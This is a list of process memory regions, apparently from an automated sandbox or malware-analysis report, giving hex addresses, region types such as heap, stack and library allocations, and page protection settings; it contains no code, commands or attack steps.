heap
page read and write
2BA3000
trusted library allocation
page read and write
1BA7E000
stack
page read and write
2B9D000
trusted library allocation
page read and write
2DC0000
trusted library allocation
page read and write
10046000
unkown
page readonly
35CF000
heap
page read and write
3B0D000
trusted library allocation
page read and write
2960000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
3154000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
298000
heap
page read and write
3185000
trusted library allocation
page read and write
37A6000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
3748000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
7FF000E5000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
24D4000
heap
page read and write
5A5E000
heap
page read and write
3170000
trusted library allocation
page read and write
24B0000
heap
page read and write
3536000
heap
page read and write
9E0000
heap
page read and write
28F0000
trusted library allocation
page read and write
1005A000
unkown
page readonly
2BA7000
trusted library allocation
page read and write
78A000
heap
page read and write
35D9000
heap
page read and write
3B0D000
trusted library allocation
page read and write
38F000
trusted library allocation
page read and write
10000
heap
page read and write
28F0000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
3CE000
heap
page read and write
2FC000
heap
page read and write
330000
heap
page read and write
2BAD000
trusted library allocation
page read and write
8D1E000
trusted library allocation
page read and write
554F000
heap
page read and write
326B000
trusted library allocation
page read and write
518F000
stack
page read and write
28B6000
trusted library allocation
page read and write
10046000
unkown
page readonly
3FA000
heap
page read and write
2910000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
23E6000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
2840000
trusted library allocation
page read and write
70A000
heap
page read and write
326E000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
313D000
trusted library allocation
page read and write
29AD000
stack
page read and write
5A96000
heap
page read and write
27E6000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
2B2000
heap
page read and write
8CEE000
trusted library allocation
page read and write
420000
heap
page read and write
2B96000
trusted library allocation
page read and write
421B000
stack
page read and write
32D000
heap
page read and write
322D000
trusted library allocation
page read and write
29E0000
heap
page read and write
326D000
trusted library allocation
page read and write
460000
heap
page read and write
2904000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
33D000
heap
page read and write
25B0000
trusted library allocation
page read and write
2BAA000
trusted library allocation
page read and write
282E000
stack
page read and write
2F0000
trusted library allocation
page read and write
390000
heap
page read and write
35D4000
heap
page read and write
2907000
trusted library allocation
page read and write
35D4000
heap
page read and write
3619000
heap
page read and write
3D8000
heap
page read and write
2CA000
heap
page read and write
2B9D000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
1FC000
stack
page read and write
3B0D000
trusted library allocation
page read and write
365000
trusted library allocation
page read and write
2C0000
heap
page read and write
3167000
trusted library allocation
page read and write
258000
heap
page read and write
3B04000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
1B0000
heap
page read and write
3418000
trusted library allocation
page read and write
7FF00022000
trusted library allocation
page execute and read and write
3AFB000
trusted library allocation
page read and write
5A5E000
heap
page read and write
2907000
trusted library allocation
page read and write
554B000
heap
page read and write
5A84000
heap
page read and write
2670000
trusted library allocation
page read and write
2BA7000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
35CF000
heap
page read and write
31C7000
trusted library allocation
page read and write
250000
trusted library allocation
page read and write
7FF00170000
trusted library allocation
page execute and read and write
2B9D000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
2F60000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
317A000
trusted library allocation
page read and write
446000
trusted library allocation
page read and write
7FF000D0000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
378A000
trusted library allocation
page read and write
31AC000
trusted library allocation
page read and write
620000
heap
page read and write
23F0000
heap
page read and write
4F48000
trusted library allocation
page read and write
2186000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
8EBE000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
42B000
heap
page read and write
2F0E000
stack
page read and write
3809000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
2BA5000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
33A3000
trusted library allocation
page execute
31C7000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
3167000
trusted library allocation
page read and write
2B60000
trusted library section
page readonly
4F60000
trusted library allocation
page read and write
3B51000
trusted library allocation
page read and write
29CC000
stack
page read and write
610000
trusted library allocation
page read and write
412000
heap
page read and write
3257000
trusted library allocation
page read and write
297000
heap
page read and write
28E6000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
217000
heap
page read and write
377A000
trusted library allocation
page read and write
3259000
trusted library allocation
page read and write
30CE000
stack
page read and write
28C4000
trusted library allocation
page read and write
3B0D000
trusted library allocation
page read and write
720000
heap
page read and write
67D000
heap
page read and write
4F60000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
2910000
trusted library allocation
page read and write
2890000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
3774000
trusted library allocation
page read and write
321E000
trusted library allocation
page read and write
35CA000
heap
page read and write
2670000
trusted library allocation
page read and write
1C5BE000
stack
page read and write
2C0A000
heap
page execute and read and write
3B04000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
220000
heap
page read and write
298000
heap
page read and write
3B0A000
trusted library allocation
page read and write
2B9D000
trusted library allocation
page read and write
2670000
trusted library allocation
page read and write
30F8000
trusted library allocation
page read and write
35D6000
heap
page read and write
2F9E000
stack
page read and write
3C8000
heap
page read and write
2904000
trusted library allocation
page read and write
3B04000
trusted library allocation
page read and write
3B10000
trusted library allocation
page read and write
4F48000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
2040000
heap
page read and write
30D000
heap
page read and write
2EF6000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
27AE000
stack
page read and write
554E000
heap
page read and write
3B04000
trusted library allocation
page read and write
8EBE000
trusted library allocation
page read and write
3331000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
352C000
heap
page read and write
4F54000
trusted library allocation
page read and write
35D4000
heap
page read and write
316B000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
1BE6000
heap
page read and write
2C80000
heap
page read and write
2DE5000
trusted library allocation
page read and write
31B5000
trusted library allocation
page read and write
104000
heap
page read and write
496000
trusted library allocation
page read and write
836E000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
35D9000
heap
page read and write
2670000
trusted library allocation
page read and write
3164000
trusted library allocation
page read and write
3015000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
3C11000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
380000
heap
page read and write
3C6000
heap
page read and write
414000
heap
page read and write
843E000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
3103000
trusted library allocation
page read and write
2FA0000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
7C3000
heap
page read and write
28B4000
trusted library allocation
page read and write
31DD000
trusted library allocation
page read and write
2CFE000
heap
page read and write
317A000
trusted library allocation
page read and write
7FF00190000
trusted library allocation
page execute and read and write
280E000
stack
page read and write
10B000
heap
page read and write
4F60000
trusted library allocation
page read and write
3B52000
trusted library allocation
page read and write
2F0000
heap
page read and write
3B19000
trusted library allocation
page read and write
2160000
trusted library allocation
page read and write
1CC40000
heap
page read and write
3250000
trusted library allocation
page read and write
3821000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
4B0000
heap
page read and write
340000
trusted library allocation
page read and write
286000
trusted library allocation
page read and write
24E0000
heap
page read and write
90CE000
trusted library allocation
page read and write
3BFB000
trusted library allocation
page read and write
2E3E000
stack
page read and write
3572000
heap
page read and write
39B9000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
1005A000
unkown
page readonly
28F0000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
12F81000
trusted library allocation
page read and write
2E64000
heap
page read and write
10057000
unkown
page read and write
4F60000
trusted library allocation
page read and write
3C8000
heap
page read and write
422000
heap
page read and write
2904000
trusted library allocation
page read and write
2830000
heap
page read and write
4F54000
trusted library allocation
page read and write
3AFB000
trusted library allocation
page read and write
359E000
heap
page read and write
2650000
heap
page read and write
4F60000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
3B0A000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
2A1000
heap
page read and write
24AE000
stack
page read and write
10E000
heap
page read and write
2904000
trusted library allocation
page read and write
7EFA3000
unkown
page read and write
3590000
heap
page read and write
30BF000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
273E000
stack
page read and write
3B39000
trusted library allocation
page read and write
2B93000
trusted library allocation
page read and write
5526000
heap
page read and write
4F54000
trusted library allocation
page read and write
2B99000
trusted library allocation
page read and write
320F000
heap
page read and write
3252000
trusted library allocation
page read and write
411000
heap
page read and write
316000
heap
page read and write
290000
heap
page read and write
10000000
unkown
page readonly
3B0A000
trusted library allocation
page read and write
31D9000
heap
page read and write
3B0D000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
3578000
heap
page read and write
2400000
trusted library allocation
page read and write
48D000
heap
page read and write
3B0D000
trusted library allocation
page read and write
A10000
heap
page read and write
30BF000
trusted library allocation
page read and write
920000
heap
page read and write
32A000
heap
page read and write
3E0000
heap
page read and write
28F0000
trusted library allocation
page read and write
4C0000
trusted library allocation
page read and write
30BF000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
2BEA000
trusted library allocation
page read and write
2E60000
heap
page read and write
2BB5000
heap
page read and write
2400000
trusted library allocation
page read and write
10046000
unkown
page readonly
21C0000
trusted library allocation
page read and write
280000
heap
page read and write
10057000
unkown
page read and write
2907000
trusted library allocation
page read and write
390000
heap
page read and write
20C0000
heap
page read and write
33AB000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
27B000
stack
page read and write
8FBE000
trusted library allocation
page read and write
5A91000
heap
page read and write
3B0D000
trusted library allocation
page read and write
3563000
heap
page read and write
2904000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
8D6E000
trusted library allocation
page read and write
2ED0000
trusted library allocation
page read and write
234000
heap
page read and write
10B000
heap
page read and write
362000
trusted library section
page read and write
3B0D000
trusted library allocation
page read and write
100000
heap
page read and write
3D9000
heap
page read and write
2904000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
851E000
trusted library allocation
page read and write
3AFB000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
10053000
unkown
page read and write
2904000
trusted library allocation
page read and write
3B13000
trusted library allocation
page read and write
5A5E000
heap
page read and write
8E2E000
trusted library allocation
page read and write
180000
heap
page read and write
3B12000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
396B000
stack
page read and write
8EEE000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
355E000
heap
page read and write
2FA0000
trusted library allocation
page read and write
35D2000
heap
page read and write
1005A000
unkown
page readonly
425000
heap
page read and write
4F20000
trusted library allocation
page read and write
843E000
trusted library allocation
page read and write
2907000
trusted library allocation
page read and write
3B1B000
trusted library allocation
page read and write
30B9000
trusted library allocation
page read and write
28C4000
trusted library allocation
page read and write
8EBE000
trusted library allocation
page read and write
10000000
unkown
page readonly
2670000
trusted library allocation
page read and write
2DCE000
stack
page read and write
326B000
trusted library allocation
page read and write
326B000
trusted library allocation
page read and write
33A0000
trusted library allocation
page execute
3620000
trusted library allocation
page read and write
46A000
heap
page read and write
4F54000
trusted library allocation
page read and write
332D000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
35D6000
heap
page read and write
4F54000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
31C0000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
2240000
trusted library allocation
page read and write
1E0000
heap
page read and write
35D9000
heap
page read and write
46E000
heap
page read and write
3CD000
heap
page read and write
3B0A000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
10057000
unkown
page read and write
3015000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
5566000
heap
page read and write
2E0E000
stack
page read and write
28E1000
trusted library allocation
page read and write
305E000
stack
page read and write
636000
trusted library allocation
page read and write
390000
heap
page read and write
29E4000
heap
page read and write
3250000
trusted library allocation
page read and write
31C7000
trusted library allocation
page read and write
640000
heap
page read and write
5A79000
heap
page read and write
4F60000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
7FF001E7000
trusted library allocation
page read and write
88BE000
trusted library allocation
page read and write
415000
heap
page read and write
3AFB000
trusted library allocation
page read and write
There are 1715 hidden memdumps, click here to show them.